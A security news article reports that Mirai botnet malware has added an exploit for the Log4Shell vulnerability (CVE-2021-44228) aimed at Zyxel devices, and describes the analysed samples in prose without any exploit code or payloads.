Log4Shell, the critical unauthenticated remote code execution vulnerability identified in early December 2021 in the Apache Log4j logging utility, hasn’t seen the mass exploitation that many expected, but an exploit for it is now part of the Mirai botnet’s arsenal, researchers warn.
Both cybercriminals and nation-state threat actors have been observed exploiting the security bug – which is tracked as CVE-2021-44228 – in their attacks, including in assaults targeting industrial organizations.
Despite that, no mass exploitation of the vulnerability has been observed to date, most likely because the industry jumped into action and took the necessary steps to address or mitigate Log4Shell and the remaining security issues identified in Log4j over the past two months.
With more threat actors adding exploits to their arsenals, exploitation of the Log4j vulnerabilities is expected to continue.
Recently, even malware spreading the Mirai botnet well known for being used to launch massive, distributed denial of service (DDoS) attacks was observed packing code designed to exploit Log4Shell (CVE-2021-44228).
An examination of a recently captured ARM binary revealed the adaptation of CVE-2021-44228 to infect and assist in the proliferation of malware used by the Mirai botnet. This vulnerability impacts multiple versions of Log4j and the applications that depend on it. These include Apache Struts2, Apache Solr, Apache Druid, Apache Flink, and many others. The exploit appears designed to specifically target devices from Zyxel, which has already confirmed impact from the vulnerability.
One of the observed samples was designed to scan for many devices vulnerable to remote code execution, while a second one dropped these functions in favour of Log4j exploitation. The standard Mirai attack functions were still present in it.
Indicators of Compromise